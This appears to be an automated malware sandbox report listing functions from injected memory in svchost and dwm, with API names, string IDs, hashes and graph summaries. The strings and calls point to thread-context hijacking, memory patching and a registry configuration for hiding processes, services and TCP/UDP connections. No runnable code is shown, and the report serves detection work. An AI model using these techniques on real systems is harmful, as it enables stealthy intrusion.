                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 0b394f0222ad10ed4458312801fa377dc5de40dcb936ecf53148d1b0853e27b0
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 98119E32A30F5021FFE41568EE56BE911C97FAC3B8F380664A977466F68AA8C9414304
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 9797d107109e69bce09e45c8849dd5af6dda54904592a7202821d35037d3ca46
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 0E61D233E8264282FA659BA4EF44FEE66E9FB87780F544519CA0B037B4DBB4D841C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: fdb2a3d7d4dbc778feb0db44ec4dd92249fa2fb54b61256c6ae827feb09f3166
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: F061AE33A02B488AEB50DF65D940BDD77E9F345B98F046215EF4A17BA8DBB8C185C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: c6c76a540a17df33cf6b33b62d86c749f28f34716d9120ac06b738ee0068be7b
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 5751F433941382CAEB748F62DA40BDA77E9F356B84F184115EE4A47BE5CBB8C490C701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 44bf977dff1b5ec5671c769ff3bcf65ab199377a69307d9c1e4287435c2f443d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: A051B872101380CAEBB48F25DA44BDDB7ECF356B89F146115DA5A47BE5CBB4D690C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 1999b6c2b026b6124529a4adba9e946b963ca658d3889168c5ba82a1dd7089a5
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: C351AF33A426029AEB14CF15EA54F9937D9F352FE8F558124DA17437A8EBB8D840C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 3dc8e3defbb4cae5588ebab0199bf55474b8a63869ade0abb043a486d88ee41a
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: D6318A32A4264196E7149F11EA44B9937E8F742FE8F158014AE9B437A4DBBCD940CB04
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 3f00fd9f30143d8ec0dc68171cd42f49f7c9ce272e972ea8ec581adce4c9e820
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: C9D10372B24A8089E751CFB9D6407DC3BF9F3547A8F244216CE5E97BA9EA74C506C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: b82fb3b3cd8c279cf6941b9ee5c2e82ae40e5202c2e4416826012ed8ae3623a2
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: F00188B2620B90C6EB85DF62FE0469E67E8F789F91F144028EA4E4372ADE78C050C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 667ac3d07cb23805d030a7f0e5a818e80c7b8aff588618ff8d56236ba759a437
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 3991E472B20A5085FBA1DF75DA40BED3BE9B744BA8F244109DE0B676A5DBB4C482C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 352795bb2acd6d720caa6935447fbf89c0e2d7ba74be2edce17ed9c1fa8f5351
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: C9113032720F0589EF40CF60ED557E833A8F759768F441E25DA6E467A5DFB8C1988380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 3de46b81bbb003b110b723b7cc6fb6e414f3f1eb92d30ba74537780c1b1e2005
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: CB71B13620178186EBF49F25EE44BEA67DCF38AB84F542026DD0B53BA9DEB5C6458700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 4f5b99736065405e28801979f0886448ceaedeffcf3269bf2fc32525654e0c9f
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 99615633A02B858AEB20DF65D980BDD77B4F349B98F044215EF4A17BA8DBB8D195C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 47ea13e0a66e27f5222f985dc41e25c44af3528301242c2dfdf270eb08d24527
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: DE51183220638181E6B5CF29AA58BFA67DEF387790F442125DD9B03BB9CAB9C504C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: be8df8e1ec03d45ea558a2a3d3bbf99ec2db0f2b8a5c9b0990fe4d8467a9cadd
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 6141B373325A8086DBA0CF25E9447EA77E8F7987A4F504021EE4E877A4EBBCC541C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: bb5eac71964d237cb1956cfb5dc8ea3c9076102839b00be22b734880a363d7cf
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: AC116D32215B8082EBA08F15F94079977E8F788B94F185220EECE47B69DF7CC551CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: b5321504703d7e0147251d0ef98098a33f2915f118edd02a8ea012e53d6d95a0
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: CBE08671A81B4690DF028F62E9406D833E4EB58B64B989122995D46321FA7CD5E9C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 87559b647f718a4499c20e0080e905f3e2ba32fd32d78ccb03bd9a23e031c331
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 14E08672A41B4580DF028F61E9405D873A4F758B64B989122C95D46321EA7CD5E5C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 80f4dcfa44d35f3495c169fc2734898f5281015fff2d1e20470a50a81ec8734b
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 69118235612B4481EA89DB66AA04AA973E9F789FD0F185028DE4E47776DFB8C442C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 8abaebeb9784320d361adda1798bbe6ec81508ad70680dff6d03265ff0a18030
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: D3E039B562170486EB458B62F90878A36E5FB89B26F148028890A07362DFBD8499C750

                                                        Execution Graph

                                                        Execution Coverage:1.7%
                                                        Dynamic/Decrypted Code Coverage:95%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:120
                                                        Total number of Limit Nodes:16
                                                        execution_graph (rendered graph not recoverable; node/edge list condensed). Nodes span 283e0f528c8-283e0f55671 and 283e0f2273c-283e0f228d4. API calls on the graph: StrCmpNIW, VirtualQuery, VirtualAlloc, GetLastError, SetThreadContext, VirtualProtect, FlushInstructionCache, GetCurrentProcess, ResumeThread, VirtualFree, IsProcessorFeaturePresent, RtlLookupFunctionEntry (via capture_previous_context), LoadLibraryA, GetProcessHeap, HeapAlloc, HeapFree, Sleep, SleepEx, StrCmpIW, StrCmpW, RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey, lstrlenW, StrCpyW.

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 961100c90e480e96f978f84af5b46bbd74024422d547977699f4927afcb3459e
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: E8714E7A712A0596EF20DF65E86865D2365FF84F88F009131DD4E47B69DF38CA66C380

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 7c571039a5083a7ed3741a0a616124c0762ee123ca80e317b4bca8d85789b135
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 79115E6A70674682EF14DB55F42826963A0FB49F85F448039DE8907754EF3DCA16C744

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph not recoverable; block/edge list condensed). Basic blocks span 283e0f55b30-283e0f55fc6. API calls on the graph: GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache, ResumeThread.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction ID: 4fde9d88b9d2a979f95deb9a0a06018f8c9113f3ee8e68dc93fbe4c6d2ae4db7
                                                        • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction Fuzzy Hash: CFD1BE7A216B4882DE70DB4AE4A935A77A0F788F85F144126EECD47B65CF3CC652CB40

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph not recoverable; block/edge list condensed). Basic blocks span 283e0f550d0-283e0f556da. API calls on the graph: GetCurrentThreadId, VirtualProtect, GetLastError.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction ID: ac642eded311a41be68fee7d927ed38165d4c38dabb135597c116e1eb5946026
                                                        • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction Fuzzy Hash: 8A02CC3621AB8486EB60CB95F4A435AB7A1F7C4F95F104025EA8E87B68DF7CC955CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: 9d8a442192541ed66a3c52caa7cc00584a5267327734ea30ca9e3a8eb4c27065
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction Fuzzy Hash: 9031282D21BA8481EE30DB5DE06935E6694FB84F84F108535F9CD46B98DF7CCB628B44

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: ca0e0f4bc485f37b0edc0d0148e7ee94eb8dad14b2baac73d92b19fa1f73fa75
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: A111C079A2660282FF60DBA4F83D3692294BF54F04F54C138AD06816A1EF78CB778350

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction ID: 998bb07d42bb39a83050369ae337537ecae4872717d47ae44a7ba8f2f1e19c79
                                                        • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction Fuzzy Hash: 84F03629615B44C1DE30DB45F46534A6BA0F788FD4F148121FD8D03B69CE3CCBA28B40

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph not recoverable; block/edge list condensed). Basic blocks span 283e0f2273c-283e0f229d0. API calls on the graph: VirtualAlloc, LoadLibraryA.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 002df8d96c72294bbaf21b0188a9e11a20fa2ef8ddea590db22a8dae7283680f
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: C761247AB0269097DB94CF15A02876D7392FB64FA4F58C131DE5907788DE38D9A3D700

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000283E0F51628: GetProcessHeap.KERNEL32 ref: 00000283E0F51633
                                                          • Part of subcall function 00000283E0F51628: HeapAlloc.KERNEL32 ref: 00000283E0F51642
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F516B2
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F516DF
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F516F9
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51719
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F51734
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51754
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F5176F
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F5178F
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F517AA
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F517CA
                                                        • Sleep.KERNEL32 ref: 00000283E0F51AD7
                                                        • SleepEx.KERNELBASE ref: 00000283E0F51ADD
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F517E5
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51805
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F51820
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51840
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F5185B
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F5187B
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F51896
